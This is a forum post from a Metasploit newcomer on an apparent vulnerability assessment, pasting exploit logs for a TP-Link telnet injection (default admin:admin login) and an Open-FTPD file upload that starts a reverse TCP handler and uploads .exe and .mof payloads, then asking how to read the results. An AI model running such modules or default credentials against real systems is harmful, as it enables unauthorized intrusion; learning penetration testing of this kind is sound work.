Metasploit's Exploit results

Hello, I'm new to Metasploit - I tried Metasploit Pro (free trial) and the msfconsole in Kali. I just wanted to ask or get clarification on certain exploitation results that Metasploit has provided on my test target. For the exploit I just uploaded the vulnerabilities identified by Nessus into Metasploit. After that, I ran the default exploit in Metasploit. Here are a few details of the results:

1*.

[+] [2017.12.27-10:28:35] Workspace:MHC 2017 VAPT - JMF Progress:710/2310 (30%) [706/2305] xxx.xx.xx.x:80 - TP-Link SC2020n Authenticated Telnet Injection
[*] [2017.12.27-10:28:36] [0706] xxxxx:80 - Exploiting
[*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Trying to login with admin : admin
[+] [2017.12.27-10:28:36] [0706] xxxxx:80 - Successful login admin : admin
[*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Telnet Port: 62116
[*] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Trying to establish telnet connection...
[-] [2017.12.27-10:28:36] [0706] xxxxxx:80 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (xxxxx:62116).

TP-Link SC2020n Authenticated Telnet Injection
https://www.rapid7.com/db/modules/exploit/linux/http/tp_link_sc2020n_authenticated_telnet_injection

*So for this exploit my concerns are:

a. Port 80 is open per the nmap scan, but Nessus did not flag it as vulnerable, so why was it exploited by Metasploit?
b. I tried to log in remotely to the target IP, but was not able to gain access using the credentials used by Metasploit to gain access (admin:admin) - I put it as username: admin and pw admin. Why was I not able to log in?
c. What could I have done to successfully exploit the target?

2**

[+] [2017.12.27-10:10:07] Workspace:MHC 2017 VAPT - JMF Progress:38/2310 (1%) [34/2305] xxxxxxx:21 - Open-FTPD 1.2 Arbitrary File Upload
[*] [2017.12.27-10:10:08] [0034] Started reverse TCP handler on 0.0.0.0:1040
[*] [2017.12.27-10:10:09] [0034] xxxx:21 - Server started.
[*] [2017.12.27-10:10:10] [0034] xxxxx:21 - Trying to upload ndJDXciFuXF.exe
[*] [2017.12.27-10:10:10] [0034] xxxxxx:21 - Connecting to FTP server xxxxxx:21...
[*] [2017.12.27-10:10:10] [0034] xxxxxxx:21 - Connected to target FTP server.
[*] [2017.12.27-10:10:10] [0034] xxxxxx:21 - Set binary mode
[*] [2017.12.27-10:10:10] [0034] xxxxxxxxx:21 - Set active mode "10,111,28,37,4,17"
[+] [2017.12.27-10:10:10] [0034] xxxxxxx:21 - Upload successful
[*] [2017.12.27-10:10:12] [0034] xxxxxxxxx:21 - Trying to upload AQaAFAtyoj.mof
[*] [2017.12.27-10:10:12] [0034] xxxxxx:21 - Connecting to FTP server xxxxxxx:21...
[*] [2017.12.27-10:10:12] [0034] xxxxxxxxxx:21 - Connected to target FTP server.
[*] [2017.12.27-10:10:12] [0034] xxxxxxxxxx:21 - Set binary mode
[*] [2017.12.27-10:10:12] [0034] xxxxxxxx:21 - Set active mode "10,111,28,37,4,17"
[+] [2017.12.27-10:10:12] [0034] xxxxxxxx:21 - Upload successful

Open-FTPD 1.2 Arbitrary File Upload
https://www.rapid7.com/db/modules/exploit/windows/ftp/open_ftpd_wbem

**Same as the first one, this was not flagged by Nessus. So my concerns here are:

a. The upload was successful, but when we checked the server for the said files, they were not there (full search of server). Why was that? Am I looking in the wrong way? What could be the reason the file was not there?

I would highly appreciate your comments on this, or any tips or corrections as to how I should interpret the results.

Thank you,
Sam

Posted by Sameer Anwar about a year ago